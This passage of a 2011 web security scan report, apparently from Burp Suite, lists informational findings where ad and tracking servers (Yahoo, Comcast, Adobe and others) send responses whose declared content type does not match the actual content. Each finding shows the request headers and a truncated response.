Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEz
...[SNIP]...

25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpAR
...[SNIP]...

25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpj
...[SNIP]...

25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.
...[SNIP]...

25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wj
...[SNIP]...

25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.yimg.com
Path:   /a/a/ma/matt/yahoo_realestate_home180x40.jpeg

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /a/a/ma/matt/yahoo_realestate_home180x40.jpeg HTTP/1.1
Host: ads.yimg.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 01:56:15 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 01:56:15 GMT
Last-Modified: Thu, 04 Aug 2011 17:06:23 GMT
Accept-Ranges: bytes
Content-Length: 4151
Content-Type: image/jpeg
Age: 38934
Proxy-Connection: keep-alive
Server: YTS/1.19.5

.PNG
.
...IHDR.......(.......G]....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d847178/33/873120/randm.js

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d847178/33/873120/randm.js HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Sat, 30 Jul 2011 04:01:37 GMT
ETag: "a51e4f9c-1-745c0a40"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Tue, 06 Sep 2011 13:14:54 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Type: application/x-javascript

;

25.8. http://beacon.dedicatednetworks.com/js/t.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.dedicatednetworks.com
Path:   /js/t.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/t.aspx?aid=084BF99942C00D12 HTTP/1.1
Host: beacon.dedicatednetworks.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP=\'IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\'
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:59:04 GMT
Content-Length: 211

var axel = Math.random()+"";
var a = axel * 10000000000000;
document.write('<IMG SRC="https://ad.doubleclick.net/activity;src=2736591;type=oomap527;cat=connm417;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 B
...[SNIP]...

25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cimage.adobe.com
Path:   /omninav/thin_omninav2.0.4.js

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /omninav/thin_omninav2.0.4.js HTTP/1.1
Host: cimage.adobe.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9bdfb6653972b784e1a414bd658816a7:1300309916"
Last-Modified: Wed, 16 Mar 2011 21:11:56 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 11721
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close

O="context.checkS.match.part.if(.et.results.){var .Sizzl.expr.ele.){..length.functi.Expr..type.===.;}.for(var.r.urn .isXML..on(.[i].re.curLoop.s.ctor.ilter.heck.ode.tr.isPartS..nQTyp.=null.else.und...
...[SNIP]...

25.11. http://comcast-www.baynote.net/baynote/tags3/common

Summary

Severity:   Information
Confidence:   Firm
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=comcast&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:22:13 GMT
Content-Length: 80021


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://customer.comcast.com
Path:   /App_Themes/Default/img/SubChannelSelected.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /App_Themes/Default/img/SubChannelSelected.gif HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=f8578a5e-0241-452c-ba18-278c838ac946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; fsr.a=1315329901557; mbox=session#1315327839174-766376#1315331762|PC#1315327839174-766376.19#1316539502|check#true#1315329962

Response

HTTP/1.0 200 OK
Content-Length: 686
Content-Type: image/gif
Last-Modified: Tue, 19 Jul 2011 19:16:10 GMT
Accept-Ranges: bytes
ETag: "0f926514846cc1:877d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:25:01 GMT
Connection: close

......JFIF.....`.`......Exif..II*..............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."......
...[SNIP]...

25.14. http://event.adxpose.com/event.flow

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
